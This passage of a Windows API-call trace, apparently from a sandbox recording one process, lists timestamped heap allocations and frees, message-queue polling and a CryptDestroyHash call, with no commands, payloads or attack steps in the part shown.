Flags=0x0, Size=0x10) returned 0x2e51400 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0235.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0235.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0235.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0235.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0235.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0235.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0235.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0235.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0235.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0235.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0235.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.042] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0235.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0235.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0235.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0235.043] CryptDestroyHash (hHash=0xa87310) returned 1 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0235.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0235.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0235.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0235.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0235.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0235.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0235.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0235.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0235.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0235.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.048] RtlAllocateHeap 